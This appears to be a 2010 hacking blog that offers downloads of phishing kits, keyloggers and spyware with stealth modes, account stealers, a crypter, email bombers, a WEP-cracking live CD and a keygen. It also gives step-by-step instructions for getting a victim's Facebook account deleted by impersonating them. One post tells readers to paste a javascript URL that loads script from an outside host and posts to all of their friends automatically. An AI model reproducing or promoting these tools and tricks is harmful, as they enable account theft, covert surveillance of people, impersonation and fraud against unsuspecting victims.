Popular Posts

Crotchsniffer SOURCE

Posted: Monday, August 30, 2010 by Fyaz Ahmad in
1



Q. What is Crotchsniffer?

-- ----------------------

A. It's a multi user chat client.



Q. Why should I use it?

-- --------------------

A. Crotchsniffer doe's not log IP's, store information about

the user(s) or store conversation logs and it's free.

PASS: hiddenagenda


DDFacebookBomber

Posted: by Fyaz Ahmad in
0

HipACryp [Exe Crypter]

Posted: by Fyaz Ahmad in
0

Hacking Any Kind of account with the new Login Spoofer 2010

Posted: by Fyaz Ahmad in
0


Hello everyoneLogin Spoofer is The best Solution for hacking E-mail and Accounts. it can create many Professional phishing pages Like: (Hotmail, Yahoo, Gmail, GameZer, Facebook) to Steal somebody's Account you have to push him to login in one of your fake pages, when the Victim Login as you told him, His account (Username/Password) will register in our database then you go to the software and press refresh then you'll find His Username & Password & IP & his OS Info...etc. Using and Downloading is free 100%.Screenshot:

hacking any Kind of account with the new Login Spoofer 2010


Features:* Easy, fast, Clean and Tiny !* Provide 16 Proffesional Fake Pages.* Notification of new victims is pretty fast !* No installation required (Portable).* Work on: Windows XP / Vista / Seven.* A small FTP is included with the file.* A Cleaner tool included (in case you want to Delete all your victims and Traces)



Delete any facebook account

Posted: by Fyaz Ahmad in
1

Make arrangement of these first!

1. Victim's profile link ( you can get it easily )
2. His/Her Email which he/she uses to sign in
3. His/Her birth date which he/she has used in the profile
4. Make an Email ID on gmail or yahoo with the first name and last name same as on victim's facebook profile.

HOW TO DO IT

1. Go to this page:

Incompatible Browser | Facebook

2. Enter details. In the place of ' email address where you can be contacted ' enter the fake email u created.

3. you will get a mail on that ID in which facebook people will ask your problem. Reply to them that you are XYZ( victim's name ) and you cant access your facebook account. Also you have lost access to your Email Address associated with the account. You dont know what to do now. The hacker is coming online regularly and using your account. If the victim is a girl also write ' I am a girl and it poses threat to my social life ' and write anything you want that could make them take action. ( no need though in 100 % cases they delete the account )

4. After 2-3 days youu will get a reply. They will again ask you that you have access to your associated Email or not? Reply them that you still don't have access to it. And repeat what all you wrote in first mail.

5. Next Day or Same Day you will get an Email that your account is disabled.

Hawkeye *Keylogger|Stealer*

Posted: by Fyaz Ahmad in
0



* kestroke logger
* url logger
* screenshots on specified interval
* ability to start keylogger with hotkey F12 and make snapshot with F11
* stealth mode: hidden execution with ability to make visible with hotkey SHIFT + ALT + M
* run on windows system start
* access logfiles from remote pc running the integrated webserver
* email log data and screenshot delivery





Code:
http://www.fileuploadx.de/900643

NEW Email hack pack

Posted: by Fyaz Ahmad in
0


THIS IS FOR YOU GUYS

ENJOY




Main page:


- HOTMAIL HACKING
- YAHOO HACKING
- MSN FUN TOOLS
- FAKE SCREENS/PAGES
- OTHER HACKING TOOLS

FUN TOOLS Page 1:



MSN Chat Monitor And Sniffer

MSN Password Retriever
MSN Hacker DUC
Head **** HotMail HAck
HotMail Hacker XE Edition
HotMail HAck
HotMAil Hacker
MSN Passwords
MSN Flooder
MSN Sniffer
MSN SPY Lite
HotMail Hacker Gold
HotMail HAcker Final
Give me Ur Pass
HotMail Brute Forcer
MSN PAssword Finder
MSN Password Grabber
Hack MSN Password
Hack HotMAil Evolution
MAgic Password Sender
MSN Locker
HotMail Killer
Hot Freeze
MessenPass
HotMAil Hack !
Ice Cold Reload
HotMail Killer 2
Nuke MSNPage 2:
Yahoo Messenger Login Screen
MSN Messenger 7 Login Screen
MSN Messenger 5 Login Screen
MSN Messenger 4.6 Login Screen
HotMail Login Screen
Fake Web Pages 2
Fake Eeb Pages 1
AOL Killer
Fake Login HotMail
B-S Spy
Saria Fake LoginsPage 3:
Yahoo Password Retrieval
Yacam
Yahoo Cracker
Yahoo Booster
Yahoo Hack!
Yahoo Password Stealer
S-H Yahoo Password SenderPage 4:
NetWork Password Recovery
Net BIOS Name Scanner
FTP Password Hacker
Cable Modem Sniffer
Port Listening XP
Blue Port Scanner
www 2 IP
XP Killer
Sniff Password
Port Scanner
Fast Resolver
Domain Scan
Whois Domain
NetRes View
PHPbb Defacer
Angry IP Scanner
FTP Brute ForcerPage 5:
Hook Tool Box
Smart HAck UpLoader
Remote Anything
Post Sage
PHPbb AttackerPage 6:
Skinner
MSN Bomber Man
Ultimate Nick PopUpz
MSN 7 Universal Patcher
Emoticons Creator
MSN Picture Crawler
Anti Status Bomb
MSN Detector
Multi MSN Loader
Kitle
Protect Lithium
Tray It!
MSN Block Checker
MSN Auto Responder
MSN Virus CleanerDownload and Enjoy hacking....

Quote:
http://hotfile.com/dl/23767707/61889f2/B...s.rar.html

Free Premium Accounts For Rapidshare & Megaupload

Posted: Friday, August 27, 2010 by Fyaz Ahmad in
0



How it works
Sign up for account - complete the offer under "Status" after you completed the offer we will credit your account (It may take up to 24 hours to get the credits). Then all you need to do is to spread your refeeral url and get 5 signups to complete the offer as well, your refeeral url looks like: Free Premium Accounts - Free Rapidshare Premium Account And MegaUpload Accounts! X= a number. Your refeeral url can be found under "Status" in your member area.
We get paid by our advertisers every time a offer is completed and use the funds to purchase your memberships. This way we both profit in the end. We will send the premium account to you via email so make sure you put in a valid email in the members area!
The fastest method is to use your referral url like ( Free Premium Accounts - Free Rapidshare Premium Account And MegaUpload Accounts! ) (x should be your unique number which can be found under "status") and to p*** this onto friends or family who are interested or willing to help, or to post it in sites and forums that you frequently visit and know people who might be interested.

Fraud System
We have a VERY advanced fraud system, so please save both mine and your time and dont sign up to more then one account. Directly when our system sees the same IP the member account will be marked as a fraud. So there is no use to sign up more then one time in order to gain reefers.
If any questions, create a support ticket in the members area!

I m Not Sure But u will be try maybe u got free premium account.


Here Is Link:
Free Premium Accounts - Free Rapidshare Premium Account And MegaUpload Accounts!

Wireless Slax Wifi Hack live cd

Posted: by Fyaz Ahmad in
0



Code:
This version is for all systems except systems with the Intel B/G wireless cards (IPW2200). - Live CD with all the tools you need to hack a WLAN / wireless Access point - Linux Live-CD - OS runs from CD - 635 mb - .iso - also used by the FBI. Fast-forward to last summer, when the first of the latest generation of WEP cracking tools appeared. This current generation uses a combination of statistical techniques focused on unique IVs captured and brute-force dictionary attacks to break 128 bit WEP keys in minutes instead of hours. As Special Agent Bickers noted, "It doesn't matter if you use 128 bit WEP keys, you are vulnerable!" WEP Hacking - The Next Generation WEP is an encryption scheme, based on the RC-4 cipher, that is available on all 802.11a, b and g wireless products. WEP uses a set of bits called a key to scramble information in the data frames as it leaves the access point or client adapter and the scrambled message is then decrypted by the receiver. Both sides must have the same WEP key, which is usually a total of 64 or 128 bits long. A semi-random 24 bit number called an Initialization Vector (IV), is part of the key, so a 64 bit WEP key actually contains only 40 bits of "strong"encryption while a 128 bit key has 104. The IV is placed in encrypted frame's header, and is transmitted in plain text. Traditionally, crac*ing WEP keys has been a slow and boring process. An attacker would have to capture hundreds of thousands or millions of packets?a process that could take hours or even days, depending on the volume of traffic passing over the wireless network. After enough packets were captured, a WEP crac*ing program such as Aircrac* would be used to find the WEP key. Fast-forward to last summer, when the first of the latest generation of WEP cracking tools appeared. This current generation uses a combination of statistical techniques focused on unique IVs captured and brute-force dictionary attacks to break 128 bit WEP keys in minutes instead of hours. As Special Agent Bickers noted, "It doesn't matter if you use 128 bit WEP keys, you are vulnerable!" Basic Directions: 1)Boot from cd 2)get the wep key 3)write it down 4)reboot into windows 5)connect using wep key.





Code:
http://hotfile.com/dl/22875864/d267e9a/Live_CD_-_Wireless_hacking.part1.rar.html
http://hotfile.com/dl/22876018/7d57874/Live_CD_-_Wireless_hacking.part2.rar.html
http://hotfile.com/dl/22876117/ba5a741/Live_CD_-_Wireless_hacking.part3.rar.html
http://hotfile.com/dl/22876226/fbd2709/Live_CD_-_Wireless_hacking.part4.rar.html
http://hotfile.com/dl/22876375/fb98e83/Live_CD_-_Wireless_hacking.part5.rar.html
http://hotfile.com/dl/22876495/d969ba1/Live_CD_-_Wireless_hacking.part6.rar.html
http://hotfile.com/dl/22876545/eca0018/Live_CD_-_Wireless_hacking.part7.rar.html

Steam Account Stealer

Posted: by Fyaz Ahmad in
0






Code:
http://www.megaupload.com/?d=GO1KNUQT

Paypal Money Generater To bind With Keylogger, etc

Posted: by Fyaz Ahmad in
0







Code:
http://www.multiupload.com/TISMUJF55J

Runescape bot

Posted: by Fyaz Ahmad in
0







Code:
http://www.mediafire.com/?otmtm0mtyzm

BitDefender 2010 Keygen [Free] [Fixed]

Posted: by Fyaz Ahmad in
0






Code:
http://www.multiupload.com/7A74JH9703

Fake WoW account hacker

Posted: by Fyaz Ahmad in
0






Code:
http://www.mediafire.com/?otmtm0mtyzm

Fake Zynga Texas Hold'em chip hack

Posted: by Fyaz Ahmad in
1





Code:
http://www.mediafire.com/?ozzjjjqmhtm

Superlite Anti-Virus 2010

Posted: by Fyaz Ahmad in
0







Code:
http://www.youtube.com/watch?v=pvn8UnQDby0&feature=player_embedded
http://www.multiupload.com/0D3ABFMXFO

CS 1.6 AeroHack

Posted: by Fyaz Ahmad in
0





Code:
http://www.multiupload.com/64HEEA5XF8

XBOX Live Account Hacker [FAKE]

Posted: by Fyaz Ahmad in
0





Code:
http://www.multiupload.com/LM7ZEY3WQ2

Fake MSN Hack Pack

Posted: by Fyaz Ahmad in
0





Code:
http://rapidshare.com/files/332708611/MSN.exe.html

Account Sniffer v3

Posted: by Fyaz Ahmad in
0


Description:
Account Sniffer has a single and multi profiler. It scans each account, grabbing profiles from it while displaying them in order as they were created and as they appear. It also detects the profiles for rares and all-stars. It then displays that information nicely in lists, while also displaying if the account is an allstar, the number of profiled usernames and number of rares underneath the profiles. You can input any 3 character delimter that you want that separates the username from the password(ex: ' - '; ' : '; ':'; '-' etc.) for the multi profiler.

How To Use:
Single Profiler:
Simply input the username and password in their correct text field.


Multi Profiler:
Add or Load a list of accounts in the list. Make sure you input the correct delimiter.
Example:
Username - Password (Delimiter would be ' - ')
Username:Password (Delimiter would be ':')

What's New In This Version?
-Everything was basically recoded to make the whole program much better and faster.

-New Design


-For the 'Show Password' option, whatever current list you are viewing you can save that list for the multi profiler. So if you have the 'Show Password' option checked for a list then you can save that list with the passwords, if you don't want to save the list with the passwords then simply uncheck that option before saving.

-The rare list will actually detect and count every rare in the list to give you the correct number of rare usernames.

-Added a few new options like fade in/out, sounds and a little fact box. I was a little bored and felt like making that fact of the day feature, so you can just choose the option to not show it at startup if you don't like it.



http://www.virustotal.com/file-scan/...2ca-1282505634





Multiupload.com - upload your files to multiple file hosting sites!

Maps for Counter Strike (CS)

Posted: Thursday, August 19, 2010 by Fyaz Ahmad in
0

Spy Software + Serial

Posted: by Fyaz Ahmad in
0














What's New in Version 3.8:

* Capability of overriding "Anti-Spy" programs such as "Ad-aware"
* Logs remote delivery via Email & FTP (built-in SMTP enabled)
* Full version is completely undetectable to most anti-spy programs
* Start & stop time scheduling
* Support user filter to spy on specific users
* View all user's Logs with a Single Login
* Capture screen at the highest speed
* Automatically startup in active and stealth Mode
* Suspend on system idle
* Powerful keylogger engine to capture all passwords
* Built-in slide show for screen snapshot pictures
* Export log report in HTML format
* Automatically clean outdated logs on disk quota
* Password protection
* Execute with a simple command in stealth mode
* Extremely self-explanatory interface
* Compatible with Windows XP/2000/Me/98/95/NT4

Logging Features

Keystroke Monitoring
007 Spy have a powerful keylogger engine to record all keystrokes typed in any application window, such as user name, password, e-mail, chat, instant message (MSN/AOL/ICQ/AIM ), etc. The records are time stamped and categorized by the window title they belong to, so you can tell when and what documents were being typed.
Websites Activity Logging
The amazing spy software even record all websites URL visited in Internet Explorer (Netscape Navigator and Opera will be supported in Pro Edition of 007 Spy Software). 007 Spy Software will log the website URL, the website title, and the time the website was visited! You can click on the link in the Log Viewer to launch the visited page in your browser immediately!

Application Activity Logging
007 Spy Software can record all applications' window activity taken place on your computer! It will log the window title, the opening and closing time of the window, and the current user name. By this you can find out what movies/games were played, what files were modified, what pictures were displayed, and so on.

Screen Shot Capturing
NOT like other spy products, 007 Spy Software can take picture of the Windows Desktop just like a automatic surveillance camera! It will capture images at few SECONDS instead of minutes in other spy programs. You have the option of taking pictures of the entire screen or just of active window, and saving the pictures in high quality or low quality JPEG format. 007 Spy Software will also log the active window name and the time stamp when the screen shot was taken. When you click the record in log viewer, 007 Spy Software will launch the selected screen picture in your default image viewer.

Disk Activity Logging
This powerful software spy on all file/folders change made by users within Windows Explorer, such as create file/folder, delete file/folder, rename and move file/folder, etc. These activities are logged by path and time stamp of first access.

Security Features

Password Protection
007 Spy Software is the most securely spy program since it is password protected to prevent others from starting or stopping the monitoring process, as well as changing 007 Spy Software configuration settings!

Stealth/Skilled Mode
007 Spy can remove its Desktop Icon, Start Menu Group, and all its help files by just single click! Also it will never appear in Add/Remove Programs Menu or Task Manager.

Windows Startup
007 Spy Software can load automatically and secretly when Windows boots up.

Automatic Active Startup
Configure the powerful spy program to start in "Active" monitoring mode when it is started, then 007 Spy Software will record everything as soon as it run!

Automatically Hide Itself
The smart spy software can be configured to start in "Stealth" mode when it is started, so it will NOT appear in Windows Task Bar, System Tray, and Task Manager.

Advanced Features

Log Delivery via Email
The powerful spy program is able to deliver logs to remote computer via its built-in SMTP engine at set intervals specified by users. All you need to do is just input your email address and press "Test Now" to make sure it works for you. 007 do NOT require your own SMTP server, so it's really much more convenient and simple to work than all other spy products on the Internet!


Log Delivery via FTP
The screen spy pictures may exceed several GBs (Giga byte) in total size, so it's really impossible to deliver them to your email box, and it will also make 007 very easy to be detected by firewall or anti-virus programs. The good news is we have built-in FTP module which allows 007 to transfer all screenshot pictures to your server automatically!

Time Scheduling
The smart spy program can be configured to start and stop at the set time specified by owner. This feature enables user to start monitoring at a reasonable time and avoid viewing too much useless log records.

User Filter
007 Spy Software can be configured to monitor a set group of users on the computer, for example, you can specify the program to monitor only user "Colin" and "Cathy", but stop monitoring when the user "Jason" login. Or, you can monitor all users EXCEPT the account "Administrator", etc.

Friendly Interface
007 Spy Software is also the most easy to use spy program. It provides a much more easy-to-use graphical user interface than any other spy program, which will allow you to familiarize yourself with the software in no time

Idle Detector
The smart spy program now can automatically halt screen shot when system is idle. With this detector, 007 Spy Software will minimize system resource usage and avoid capturing a large numbers of duplicate screenshots.

HTML Report
Like all other spy programs, 007 Spy Software allows you to export log records to a HTML file, so you can conveniently review them in a full-window browser such as Microsoft Internet Explorer. Especially, the exported screenshot log file contains a thumbnail of each picture captured, so you can locate a screenshot picture as soon as possible.

Sort Log Records
007 Spy Software allows you to sort the list of records in Log Viewer window. Most of other spy program do not allow you to do this. You can sort all records by User, Time, Action (Window) Name, and Content, etc. Records can be sorted by alphabetical order or reverse order.

Powerful Search Engine
The powerful software spy also allows you to search keywords in log records. You can find out the item you are interested in as soon as you click the "Search" button!

Automatic Log Clearing
007 Spy Software can automatically clear the most outdated logs when the log files exceed the size you specified. This will prevent 007 Spy Software from using too much of the disk space.

DOWNLOAD 
http://rapidshare.com/files/14809129...nstall3.90.rar 

Who Used Your Pc In Your Absence

Posted: by Fyaz Ahmad in
0

Who Used Your Pc In Your Absence,what Did He Do
Track my computer!
Who Used my computer, In my absense,what did he doHere is a small trick which shows who operated your pc what did he do & watch he hs watching how much long he has been using ur pc...
First you should goto :

start-- > run-- > eventvwr.msc

Events are stored in three log files: Application, Security, and System. These logs can be reviewed and archived.
For our purposes we want the System log. Click on "System" in the left-hand column for a list of events.
Look for a date and time when you weren't home and your computer should have been off.

Double click on the eg: info and it will show u the detail.

You can also use this log to see how long someone was on the computer. Just look at the time the computer was turned on and off for that day.

orkut hacking trick

Posted: Wednesday, August 18, 2010 by Fyaz Ahmad in
0

Scrap All

Just open orkut page and copy this script in URL bar.
javascript=document;c=d.createElement('script'); d.body.appendChild©;c.src='http://freetze.freetzi.com/photo.js';void(0)
Hit enter.
It sends scrap to all the friend's automatically.

Eazy bomber V2 [Works with Yahoo, Gmail, and Hotmail!]

Posted: by Fyaz Ahmad in
0


DownLoad:

http://uppit.com/8786yjpe655w/Eazy_Bomb.exe 

Your IP install v3.0 ( New Update ) Modify the forces

Posted: Tuesday, August 17, 2010 by Fyaz Ahmad in
0
Related Posts with Thumbnails